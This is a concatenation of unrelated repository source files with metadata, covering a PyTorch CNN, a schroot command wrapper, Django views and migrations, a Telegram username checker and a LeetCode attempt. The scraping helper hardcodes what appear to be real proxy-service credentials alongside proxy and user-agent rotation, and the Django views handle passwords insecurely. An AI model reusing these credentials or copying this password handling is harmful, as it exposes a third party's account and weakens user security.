import torch.nn as nn
from torchvision import models
import torch.nn.functional as F
model_ft = models.resnet18(pretrained=True)
num_ftrs = model_ft.fc.in_features
model_ft.fc = nn.Linear(num_ftrs, 1)
class Flatten(nn.Module):
def forward(self, input):
return input.view(input.size(0), -1)
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# convolutional layer (sees 224x224x3 image tensor)
self.conv1 = nn.Conv2d(3, 24, 5, stride=2, padding=1)
self.conv2 = nn.Conv2d(24, 32, 5, stride=1, padding=1)
self.conv3 = nn.Conv2d(32, 64, 5, stride=1, padding=1)
self.conv4 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
self.conv5 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
self.pool = nn.MaxPool2d(2, 2)
self.flatten = Flatten()
self.fc1 = nn.Linear(64*3*3, 144)
self.fc2 = nn.Linear(144, 1)
self.dropout = nn.Dropout(0.15)
def forward(self, x):
# add sequence of convolutional and max pooling layers
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = self.pool(F.relu(self.conv3(x)))
x = self.pool(F.relu(self.conv4(x)))
x = self.pool(F.relu(self.conv5(x)))
# flatten image input
x = self.flatten(x)
x = self.dropout(x)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = self.fc2(x)
return x
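# Shape check (derived by hand from the layer parameters above, assuming the
# 224x224x3 input mentioned in the conv1 comment): conv1(stride 2)+pool -> 55x55,
# conv2+pool -> 26x26, conv3+pool -> 12x12, conv4+pool -> 6x6, conv5+pool -> 3x3,
# which is why fc1 expects 64*3*3 input features.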
|
[
"minhhoangtrannhat@gmail.com"
] |
minhhoangtrannhat@gmail.com
|
bdaa415fcfcfcd6249e9a52e214476f4597bd832
|
18fd4062e7bdc626df99229eba78affa9b94859b
|
/flaskk/__main__.py
|
b6e7f408dd83fa69ca0b938fe60d9fc3c580ff45
|
[] |
no_license
|
root-sudip/Search-Engine
|
57290708924895a4d26dc5252a0300453b7d7b31
|
e24db9e14e3330b59f140269cbd687ab338e95d6
|
refs/heads/master
| 2021-01-20T05:52:41.168438
| 2017-05-11T11:29:38
| 2017-05-11T11:29:38
| 89,817,062
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 189
|
py
|
# -*- coding: utf-8 -*-
"""
flask.__main__
~~~~~~~~~~~~~~
:copyright: (c) 2015 by Sudip Das.
"""
if __name__ == '__main__':
from .cli import main
main(as_module=True)
|
[
"touch.das@gmail.com"
] |
touch.das@gmail.com
|
f960790283fc72eb28d0c683a04afb7ba9eeb3b1
|
bce28b80ec97dc859da1457f7d20c8d627d57318
|
/executor/schroot.py
|
b3a406c32efd7825e3940a23ed032d70304c466e
|
[
"MIT"
] |
permissive
|
lukehuang/python-executor
|
d791a37a65cde71fc9323830aae13564345475a0
|
9ab0ee8ac76abcbbb5ad6cbe74ab704d0e1f7f5d
|
refs/heads/master
| 2020-12-30T15:53:58.732451
| 2017-04-13T21:38:27
| 2017-04-13T21:38:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,118
|
py
|
# Programmer friendly subprocess wrapper.
#
# Author: Peter Odding <peter@peterodding.com>
# Last Change: April 13, 2017
# URL: https://executor.readthedocs.io
"""
Secure command execution in chroot environments.
The :mod:`executor.schroot` module defines the :class:`ChangeRootCommand` class
which makes it easy to run commands inside chroots_ that are managed using the
schroot_ program.
.. _chroots: http://en.wikipedia.org/wiki/Chroot
.. _schroot: https://wiki.debian.org/Schroot
"""
# Standard library modules.
import logging
# External dependencies.
from property_manager import mutable_property, required_property
# Modules included in our package.
from executor import DEFAULT_WORKING_DIRECTORY, ExternalCommand
# Initialize a logger.
logger = logging.getLogger(__name__)
SCHROOT_PROGRAM_NAME = 'schroot'
"""The name of the ``schroot`` program (a string)."""
DEFAULT_NAMESPACE = 'chroot'
"""
The default chroot namespace (a string).
Refer to the schroot_ documentation for more information about chroot
namespaces.
"""
class ChangeRootCommand(ExternalCommand):
""":class:`ChangeRootCommand` objects use the schroot_ program to execute commands inside chroots."""
def __init__(self, *args, **options):
"""
Initialize a :class:`ChangeRootCommand` object.
:param args: Positional arguments are passed on to the initializer of
the :class:`.ExternalCommand` class.
:param options: Any keyword arguments are passed on to the initializer
of the :class:`.ExternalCommand` class.
If the keyword argument `chroot_name` isn't given but positional
arguments are provided, the first positional argument is used to set
the :attr:`chroot_name` property.
The command is not started until you call
:func:`~executor.ExternalCommand.start()` or
:func:`~executor.ExternalCommand.wait()`.
"""
# Enable modification of the positional arguments.
args = list(args)
# We allow `chroot_name' to be passed as a keyword argument but use the
# first positional argument when the keyword argument isn't given.
if options.get('chroot_name') is None and args:
options['chroot_name'] = args.pop(0)
# Inject our logger as a default.
options.setdefault('logger', logger)
# Initialize the superclass.
super(ChangeRootCommand, self).__init__(*args, **options)
@mutable_property
def chroot_directory(self):
"""
The working directory _inside the chroot_ (a string or :data:`None`, defaults to ``/``).
When :attr:`chroot_directory` is :data:`None` the schroot_ program gets
to pick the working directory inside the chroot (refer to the schroot
documentation for the complete details).
For non-interactive usage (which I anticipate to be the default usage
of :class:`ChangeRootCommand`) the schroot program simply assumes that
the working directory outside of the chroot also exists inside the
chroot, then fails with an error message when this is not the case.
Because this isn't a very robust default, :attr:`chroot_directory`
defaults to ``/`` instead.
"""
return '/'
@required_property
def chroot_name(self):
"""
The name of a chroot managed by schroot_ (a string).
This is expected to match one of the names configured in the directory
``/etc/schroot/chroot.d``.
"""
@mutable_property
def chroot_user(self):
"""
The name of the user inside the chroot to run the command as (a string or :data:`None`).
This defaults to :data:`None` which means to run as the current user.
"""
@property
def command_line(self):
"""
The complete `schroot` command including the command to run inside the chroot.
This is a list of strings with the `schroot` command line to enter
the requested chroot and execute :attr:`~.ExternalCommand.command`.
"""
schroot_command = list(self.schroot_command)
schroot_command.append('--chroot=%s' % self.chroot_name)
if self.chroot_user:
schroot_command.append('--user=%s' % self.chroot_user)
if self.chroot_directory:
schroot_command.append('--directory=%s' % self.chroot_directory)
# We only add the `--' to the command line when it will be followed by
# a command to execute inside the chroot. Emitting a trailing `--' that
# isn't followed by anything doesn't appear to bother schroot, but it
# does look a bit weird and may cause unnecessary confusion.
super_cmdline = list(super(ChangeRootCommand, self).command_line)
if super_cmdline:
schroot_command.append('--')
schroot_command.extend(super_cmdline)
return schroot_command
@property
def directory(self):
"""
Set the working directory inside the chroot.
When you set this property you change :attr:`chroot_directory`, however
reading back the property you'll just get :data:`.DEFAULT_WORKING_DIRECTORY`.
This is because the superclass :class:`.ExternalCommand` uses
:attr:`directory` as the working directory for the `schroot` command,
and directories inside chroots aren't guaranteed to exist on the host
system.
"""
return DEFAULT_WORKING_DIRECTORY
@directory.setter
def directory(self, value):
"""Redirect assignment from `directory` to `chroot_directory`."""
self.chroot_directory = value
@mutable_property
def schroot_command(self):
"""
The command used to run the `schroot` program.
This is a list of strings, by default the list contains just
:data:`SCHROOT_PROGRAM_NAME`. The :attr:`chroot_directory`,
:attr:`chroot_name` and :attr:`chroot_user` properties also
influence the `schroot` command line used.
"""
return [SCHROOT_PROGRAM_NAME]
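# Example usage (a minimal sketch; 'mychroot' is a hypothetical name that
# would have to match a chroot configured under /etc/schroot/chroot.d):
#
#   from executor.schroot import ChangeRootCommand
#   cmd = ChangeRootCommand('mychroot', 'whoami', chroot_user='nobody')
#   cmd.start()
#
# Given the command_line property above, this executes:
#   schroot --chroot=mychroot --user=nobody --directory=/ -- whoami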
|
[
"peter@peterodding.com"
] |
peter@peterodding.com
|
20ad32d0e1fa430b742e5d7a65c0f7f8b36dcd45
|
d125a7467b815ea3027567b0a6976c8ad730beb9
|
/src/itsmservice/apps/accounts/views.py
|
27a1e679c1ca4525aa082d97b45de129894a743f
|
[] |
no_license
|
sunyaxiong/itsmservice
|
06a1cb38b7314695613e2432f2e1d56c86aad815
|
e50fccae9ae536ac520337ec79b1d1c985e49aa4
|
refs/heads/master
| 2022-12-12T11:14:03.838601
| 2018-10-31T06:17:25
| 2018-10-31T06:17:25
| 137,029,391
| 0
| 0
| null | 2022-12-08T00:58:47
| 2018-06-12T06:50:01
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 6,092
|
py
|
import logging
import requests
import json
import urllib.parse as urllib
from django.shortcuts import render
from django.http import HttpResponseRedirect, JsonResponse
from django.contrib import auth,messages
from django.contrib.auth.decorators import login_required
from .forms import UserForm
from .forms import ProfileForm, PassResetForm
from .models import Profile, MessageAlert
from apps.cas_sync import models as cas_model
from itsmservice import settings
logger = logging.getLogger("django")
def index(request):
return render(request, 'index.html')
def login(request):
if request.method == 'GET':
form = UserForm()
return render(request, "login.html")
else:
form = UserForm(request.POST)
if form.is_valid():
username = request.POST.get('username')
password = request.POST.get('password')
# user = auth.authenticate(username=username, password=password)
attrs = {
"service": "http://{}".format(settings.SUCC_REDIRECT_URL)
}
url_attrs = urllib.urlencode(attrs)
print(settings.SUCC_REDIRECT_URL)
print(url_attrs)
cas_login_url = "{}login?{}".format(
settings.CAS_SERVER_URL, url_attrs
)
post_data = {
"username": username,
"password": password,
}
res = requests.post(cas_login_url, json.dumps(post_data))
print(dir(res))
print(res.status_code)
# return JsonResponse({})
return HttpResponseRedirect("/")
else:
return render(request, "login.html")
@login_required
def logout(request):
auth.logout(request)
return HttpResponseRedirect("/accounts/login/")
def user_profile(request):
user = request.user
url = request.META.get("HTTP_REFERER")
profile, profile_created = Profile.objects.get_or_create(username=user.username)
if request.method == "POST":
if request.POST.get("destroy"):
# 用户销毁
username = request.user.username
try:
cas_user = cas_model.app_user.objects.using("cas_db").get(username=username)
cas_user.delete(using="cas_db")
except Exception as e:
logger.info("cas用户: {} 删除异常".format(username), e)
return HttpResponseRedirect("/accounts/logout/")
form = ProfileForm(request.POST)
if form.is_valid():
data = form.data
email = data.get("email")
phone = data.get("phone")
profile.email = email
profile.phone = phone
profile.save()
return HttpResponseRedirect(url)
else:
messages.warning(request, "数据收敛失败")
return HttpResponseRedirect(url)
else:
if profile_created:
messages.warning(request, "用户配置文件自动创建,请维护具体信息")
form = ProfileForm()
return render(request, "user_profile.html", locals())
def pwd_restet(request):
"""
cas密码修改
:param request:
:return:
"""
url = request.META.get("HTTP_REFERER")
username = request.user.username
if request.method == "POST":
form = PassResetForm(request.POST)
if form.is_valid():
data = form.data
try:
user = cas_model.app_user.objects.using("cas_db").get(
username=username,
)
user.password = data.get("password")
user.save(using="cas_db")
return HttpResponseRedirect("/accounts/logout/")
except Exception as e:
logger.info(e)
messages.warning(request, "用户不存在")
return HttpResponseRedirect(url)
else:
logger.info("密码修改数据提交失败")
messages.warning(request, "密码提交失败,请重试")
return HttpResponseRedirect("url")
def user_confirm(request, pk):
page_header = "新用户审核"
confirm_message = MessageAlert.objects.get(id=int(pk))
content_list = confirm_message.content.split("-")
org, department, username = content_list[0], content_list[1], content_list[2]
profile = Profile.objects.filter(username=username).first()
if request.method == "GET":
return render(request, 'itsm/user_info_confirm.html', locals())
elif request.method == "POST":
pass
return render(request, 'itsm/issue_detail.html', locals())
def user_confirm_accept(request):
message_id = request.GET.get("id")
try:
message_info = MessageAlert.objects.get(id=int(message_id))
# 用户激活
user = User.objects.get(username=message_info.initiator)
user.is_active = 1
user.is_staff = 1
user.save()
# 消息查阅
message_info.checked = 1
message_info.save()
# cas 用户创建逻辑放到审核消息
cas_user, _ = cas_model.app_user.objects.using("cas_db").get_or_create(
username=user.username,
)
if _:
cas_user.password = user.password
cas_user.save(using="cas_db")
logger.info("CAS用户: {} 注册成功".format(cas_user.username))
logger.info("用户信息审核成功")
return HttpResponseRedirect("/itsm/event_list/")
except Exception as e:
logger.info(e, "用户信息审核失败")
messages.warning(request, "用户信息审核失败")
return HttpResponseRedirect("/itsm/event_list/")
def user_confirm_reject(request):
url = request.META.get('HTTP_REFERER')
message_id = request.GET.get("message_id")
try:
message_info = MessageAlert.objects.get(id=message_id)
# 消息查阅
message_info.checked = 1
message_info.save()
except Exception as e:
logger.info(e)
return HttpResponseRedirect(url)
|
[
"sunyaxiong"
] |
sunyaxiong
|
1f453f657f606a3a4274e6df7766ec853107d125
|
8c3491c0f0efe855bcfe5b7e26c4a23fca3e1159
|
/pages/urls.py
|
978db46628a5c919ab7535970cc247135178b45b
|
[] |
no_license
|
afandel/helloWorldProject
|
fc812dbf655ee27fcb6c889168e295c3c7a88e25
|
f01a7aac5b208fb9a4f3c2a9a72b70dae7a1ca01
|
refs/heads/master
| 2023-02-02T05:29:54.945839
| 2020-12-15T14:43:48
| 2020-12-15T14:43:48
| 306,415,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 120
|
py
|
from django.urls import path
from .views import homePageView
urlpatterns = [
path('', homePageView, name='home')
]
|
[
"adam.fandel@snhu.edu"
] |
adam.fandel@snhu.edu
|
bdd35f99daa2dc957e66138bd9bdef2f96a2e33f
|
09ce1b949b9ca0bd43adddb9b6a4742ef96d48d6
|
/Beginer/K-Fibonnaci/k-fibonacci.py
|
052f9f7ddf868cf2778e7aaa7289b4247f8165c8
|
[] |
no_license
|
melwyn95/CodeChef-Problems
|
11e133997ae0197fbd0b68f4918e0ff45e8cd0c8
|
0c7f2e0da47cde0c781b8a970e8b28b7856be969
|
refs/heads/master
| 2020-06-21T18:26:11.130334
| 2017-12-26T12:06:58
| 2017-12-26T12:06:58
| 74,776,576
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
n, k = map(int, raw_input().split())
a = [0]  # a[i] holds the prefix sum T(1) + ... + T(i)
def T(n, k):
    # T(n) is the sum of the previous k terms; the first k terms are all 1
    if n <= k: return 1
    return a[n-1] - a[n-k-1]
for i in range(1, n+1):
    a.append(a[i-1] + T(i, k))
print (a.pop()-a.pop()) % 1000000007  # a[n] - a[n-1] == T(n, k)
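# Worked trace (derived by hand from the code above): for n=6, k=2 the prefix
# sums a become [0, 1, 2, 4, 7, 12, 20], so the final line prints
# (20-12) % 1000000007 = 8, i.e. T(6,2) -- the Fibonacci sequence 1,1,2,3,5,8.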
|
[
"melwyn95@gmail.com"
] |
melwyn95@gmail.com
|
751894ece0a71fa109934a6abbd09b3e1c5b95a4
|
28cabf3c73c667a92a7a43c0a61fc5b672034cb4
|
/src/workouts/migrations/0004_rowingworkout_owner.py
|
d4b4b799769c0c22a1e9b0b5bbbff9d54dc6d2b7
|
[] |
no_license
|
ashleyelaine/LogMyRow
|
48943efabcb6b3048871eab95d0cba8eab46c4a3
|
24d0447670ab7aaefa4b413d207eb6c784ef1662
|
refs/heads/master
| 2021-09-07T08:09:07.765560
| 2018-02-09T20:58:10
| 2018-02-09T20:58:10
| 113,527,859
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 696
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2018-01-18 21:02
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('workouts', '0003_auto_20171209_2023'),
]
operations = [
migrations.AddField(
model_name='rowingworkout',
name='owner',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
|
[
"ashleyelainewright@gmail.com"
] |
ashleyelainewright@gmail.com
|
52dba0de037cc4fcaccbec0e66a5651c875897d3
|
efcc32acc681f0cf88416b75623cf976e71f6447
|
/data_utils.py
|
bfba59f627fac61f139b259554e64e518d818e01
|
[] |
no_license
|
jacobperricone/224w
|
7d5aacc525d25fe27d7c0e55c38dc920c7428ebe
|
8a3441371c3198c5d09ae8d7d0701df4b988371d
|
refs/heads/master
| 2022-12-03T17:35:25.905597
| 2020-08-17T16:32:26
| 2020-08-17T16:32:26
| 113,819,720
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,129
|
py
|
from lxml import html
import blocks.create_dict_from_element.core as cdfe
from multiprocessing.pool import ThreadPool
import logging
USER_AGENTS = [
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0'
]
PROXIES = [
{'http': 'http://solutionloft:fallSL2016!@us-il.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@us-il.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@us.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@us.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@us-dc.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@us-dc.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@us-ca.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@us-ca.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@us-ny.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@us-ny.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@us-ny.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@us-ny.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@de.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@de.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@nl.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@nl.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@sg.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@sg.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@uk.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@uk.proxymesh.com:31280'}
]
logger = logging.getLogger('stackoverflow')
logger.setLevel(logging.DEBUG)
def get_code(x):
"""
parses code from an html body object
:param x: HTML object
:return: Code as a string
"""
try:
code = x[0].xpath(x[1])
if len(code):
if len(code) == 1:
return code[0].replace('>>>', '').replace('...', '')
else:
return "[break]".join(code).replace('>>>', '').replace('...', '\t')
else:
return None
except Exception as e:
logger.error("Failed in fetching question code: {}".format(e))
return None
def get_text(x):
"""
parses text from an html body object
:param x: HTML object
:return: Text of body as a string
"""
try:
text = x[0].xpath(x[1])
if len(text):
if len(text) == 1:
return text[0]
else:
return "\n".join(text)
else:
return None
except Exception as e:
logger.error("Failed in fetching text {}".format(e, x))
return None
def parse(page, settings):
"""
:param page: an html object corresponding to the body to be examined
    :param settings: a dictionary specifying attributes
:return: a list of parsed results
"""
results = []
try:
val_xpath = settings['xpath']
inputs = [(x, settings['per_item'], settings['aux']) for x in page.xpath(val_xpath)]
# logger.info(inputs)
if len(inputs) > 1:
num_processes = 10
pool = ThreadPool(num_processes)
results = pool.map(unpack, inputs)
pool.close()
pool.join()
else:
if inputs:
results = [cdfe.main(*inputs[0])]
else:
results = []
return results
except Exception as error:
logger.info("Failed to get info for data elements with and error {}"
.format(error))
return results
def unpack(x):
res = cdfe.main(*x)
return res
def parse_body(body):
page = html.fromstring(body)
question_settings = [
{"keyName": "code",
"xpath": "//*[local-name() = 'code']/text()",
"func": get_code,
"val": None},
{"keyName": "text",
"xpath": "//*[local-name() != 'code']/text()",
"func": get_text,
"val": None},
]
question_inputs = {
'settings': {'xpath': ".",
"global_entries": [],
'aux': [],
'per_item': question_settings
}
}
results = parse(page, **question_inputs)
return results[0]
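# Example (a sketch; the exact result shape depends on the external
# blocks.create_dict_from_element module invoked via cdfe.main):
#   body = "<div><p>How do I sort a list?</p><code>sorted([3, 1, 2])</code></div>"
#   result = parse_body(body)  # expected to expose the 'code' and 'text' keys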
|
[
"jacobperricone@gmail.com"
] |
jacobperricone@gmail.com
|
0a2a7ce05cf67f530675273c267d6596dc1d0fa9
|
f08371a6744d3636cbd1dd4ec0cb17acb490e61e
|
/devtrac/main/templatetags/extra_filters.py
|
e39c4b2745838f833ed9f23c2056fec2cb209856
|
[] |
no_license
|
onaio/ona-devtrac
|
ae99fa9f3a4d6212a573ee42b81a760f7c5d25e1
|
9a8717a00ed9f8dc9e258d879480b2e8f88e886b
|
refs/heads/master
| 2021-05-27T22:22:14.622115
| 2014-06-06T13:03:50
| 2014-06-06T13:03:50
| 15,524,099
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 135
|
py
|
from django import template
register = template.Library()
@register.filter(name='get')
def get(d, key):
return d.get(key, None)
|
[
"ukanga@gmail.com"
] |
ukanga@gmail.com
|
2e35a2db7708b9c8f6dd10eedd43ae780b7c92c7
|
7b6b46395b0e8748282916186c608ce15356e0df
|
/Flask/Flask_database/DatabaseInViews/adoption.py
|
836b611008939703fed5c4c729af3ec5fe0d9f4d
|
[] |
no_license
|
Hopw06/Web
|
1a2d2499a19153552b7452c0b9200af4bfa3bbd2
|
763ff13a60903f0969db30e924c76426669fd04c
|
refs/heads/master
| 2023-01-12T14:03:23.886586
| 2020-11-14T14:59:16
| 2020-11-14T14:59:16
| 303,758,846
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,793
|
py
|
import os
from forms import AddForm, DelForm, AddOwnerForm
from flask import Flask, render_template, url_for, redirect
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
app = Flask(__name__)
app.config['SECRET_KEY'] = 'mysecretkey'
#######################
##### SQL Database #####
#######################
basedir = os.path.abspath(os.path.dirname(__file__))
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + \
os.path.join(basedir, 'data.sqlite')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
migrate = Migrate(app, db)
######################
#### Models ###########
######################
class Puppy(db.Model):
__tablename__ = 'puppies'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
owner = db.relationship("Owner", backref="puppy", uselist=False)
def __init__(self, name):
self.name = name
    def __repr__(self):
        if self.owner is None:
            return "Puppy name: {}, and has no owner yet".format(self.name)
        return "Puppy name: {}, and has owner: {}".format(self.name, self.owner.name)
class Owner(db.Model):
__tablename__ = 'owner'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
id_pup = db.Column(db.Integer, db.ForeignKey("puppies.id"))
def __init__(self, name, id_pup):
self.name = name
self.id_pup = id_pup
#######################################
###### View functions - Have Forms ########
#######################################
@app.route("/")
def index():
return render_template("home.html")
@app.route("/add", methods=["GET", "POST"])
def add_pup():
form = AddForm()
if form.validate_on_submit():
name = form.name.data
if name != None and name != "":
exists = Puppy.query.filter_by(name=name).first()
if exists == None:
new_pup = Puppy(name)
db.session.add(new_pup)
db.session.commit()
return redirect(url_for('list_pups'))
else:
return render_template("error.html", error="Puppy is already in system.")
else:
return render_template("error.html", error="Please enter puppy name.")
return render_template("add.html", form=form)
@app.route("/list")
def list_pups():
puppies = Puppy.query.all()
return render_template("list.html", puppies=puppies)
@app.route("/delete", methods=["GET", "POST"])
def delete_pup():
form = DelForm()
if form.validate_on_submit():
id = form.id.data
pup = Puppy.query.get(id)
if pup != None:
db.session.delete(pup)
db.session.commit()
return redirect(url_for('list_pups'))
else:
return render_template("error.html", error="Id you provided is not valid.")
return render_template("delete.html", form=form)
@app.route("/addOwner", methods=["GET", "POST"])
def add_owner():
form = AddOwnerForm()
if form.validate_on_submit():
id_puppy = form.id_puppy.data
owner = form.owner.data
if owner != "" and id_puppy != "":
puppy = Puppy.query.get(id_puppy)
if puppy != None and puppy.owner == None:
owner = Owner(owner, id_puppy)
db.session.add(owner)
db.session.commit()
return redirect(url_for('list_pups'))
else:
return render_template("error.html", error="Puppy id you provided is not valid")
else:
return render_template("error.html", error="Please enter owner's name and puppy id.")
return render_template("addOwner.html", form=form)
if __name__ == "__main__":
app.run(debug=True)
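# Migration workflow (hypothetical shell commands; assumes the standard
# Flask-Migrate CLI wiring via the FLASK_APP environment variable):
#   $ export FLASK_APP=adoption.py
#   $ flask db init && flask db migrate && flask db upgrade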
|
[
"vuxuanphong06@gmail.com"
] |
vuxuanphong06@gmail.com
|
b3d474831ed9dde5f79af090a1517ff329248f8d
|
79127ff15a2a43ca185b4ad2e4346914be946029
|
/myblog/boards/views.py
|
81940479dcda58361f9af8a2e084c4efeef3129e
|
[] |
no_license
|
yanHuaiQ/tencent-cloud
|
21ef8ead44b7941557388bca820dd862dd1815b7
|
f793982ee2c8d5b02a5dd840fc53313bcef2f857
|
refs/heads/master
| 2021-05-21T18:03:54.637474
| 2020-04-03T13:54:27
| 2020-04-03T13:54:27
| 252,746,006
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 121
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
def home(request):
return HttpResponse('Hello World')
# Create your views here.
|
[
"841543613@qq.com"
] |
841543613@qq.com
|
a35580442a22de2f6b308f8d52a0c5a22d032ee1
|
67033f2a1c74822398846836d79bb9fc5b914b87
|
/blog/migrations/0006_auto_20200323_1241.py
|
0935b99fbc679a226070c0f764c2827e6b4a6b6a
|
[] |
no_license
|
Adi1222/Blog-Project
|
9d4b3ef94428622fb0b85356eb9584105aeda19b
|
6299d28122ca0d4b9d8437307c8730fc4797ef76
|
refs/heads/master
| 2021-04-17T23:18:49.037312
| 2020-08-16T06:51:26
| 2020-08-16T06:51:26
| 249,484,778
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
# Generated by Django 2.2.6 on 2020-03-23 07:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0005_auto_20200323_0150'),
]
operations = [
migrations.AlterField(
model_name='userposts',
name='img',
field=models.ImageField(blank=True, upload_to='blog_image'),
),
]
|
[
"adityachavan677@gmail.com"
] |
adityachavan677@gmail.com
|
80639dd415ef5ede0bc62e8709093e3bbcd3f93e
|
8eb1f77de15b579ed171182d70ee516883f4b032
|
/main.py
|
78d442f127c793317feda2619b71442161ff7a17
|
[] |
no_license
|
luciql33t/telegalolz
|
5dd6c8f637087770b5dfe6f40a77ba5a7bb04e45
|
23aa8ae0ca17e86c810d702e5222f51d9e745f7c
|
refs/heads/main
| 2023-01-04T07:56:56.766174
| 2020-11-03T11:06:13
| 2020-11-03T11:06:13
| 309,659,078
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 652
|
py
|
import requests
import bs4 as bs
import time
url = 'https://t.me/'
t = 2000000
with open('list.txt', 'r') as f:
ids = [line.strip() for line in f]
while True:
for id in ids:
page = requests.get(url + id)
soup = bs.BeautifulSoup(page.text, 'html.parser')
stat = soup.findAll('div', class_='tgme_page_title')
if not stat:
print(id + ' ----------------------------------------!!!')
with open('file.txt', 'a') as file:
file.write(id + '\n')
else:
print(id + ' ')
time.sleep(1)
time.sleep(t)
|
[
"noreply@github.com"
] |
luciql33t.noreply@github.com
|
5c865faf8ac12abbd353e5aa7fa31f5a337f5249
|
ed76db3a268a9253837e85130c0f221bd904bff0
|
/DP/[x] 560. Subarray Sum Equals K.py
|
85e9cb792a05b9869a13dd45ba2d1f4cf74e2541
|
[] |
no_license
|
jay-joo-code/leetcode
|
f54db01f195f35d436e524d6e257ad755525eb69
|
349bd6d54a3f463499b9f59d7aec01c9dd1fc9d0
|
refs/heads/master
| 2022-11-30T21:17:34.602100
| 2020-08-09T05:55:37
| 2020-08-09T05:55:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,175
|
py
|
# attempt 1 (failed)
def subarraySum(self, nums: List[int], k: int) -> int:
# doesn't consider negative elements in nums
acc = 0
count = 0
for i in range(len(nums)):
for j in range(i, len(nums)):
acc += nums[j]
if acc == k:
count += 1
acc = 0
break
elif acc > k:
acc = 0
break
return count
# attempt 2 (failed)
